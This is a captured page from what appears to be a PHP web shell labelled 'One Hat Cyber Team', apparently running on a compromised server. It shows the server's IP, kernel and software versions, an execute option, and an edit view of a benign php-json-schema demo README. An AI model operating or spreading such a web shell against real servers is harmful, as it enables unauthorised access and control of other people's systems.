⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.144
Server IP:
157.245.143.252
Server:
Linux www 6.11.0-9-generic #9-Ubuntu SMP PREEMPT_DYNAMIC Mon Oct 14 13:19:59 UTC 2024 x86_64
Server Software:
nginx/1.26.0
PHP Version:
8.3.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
php-json-schema
/
examples
/
Edit File: README.md
## JsonSchema\Validator Demo This demo script uses the example from the root README.md and provides sample JSON files for testing `JsonSchema\Validator`. To change or replace the JSON schema document, please edit `/path/to/json-schema/demo/schema.json`. To change or replace the JSON document that is validated, please edit `/path/to/json-schema/demo/data.json`. To run the demo, change the path in the following example and run it in your terminal. ``` cd /path/to/json-schema/demo php demo.php // The supplied JSON validates against the schema. ```
Simpan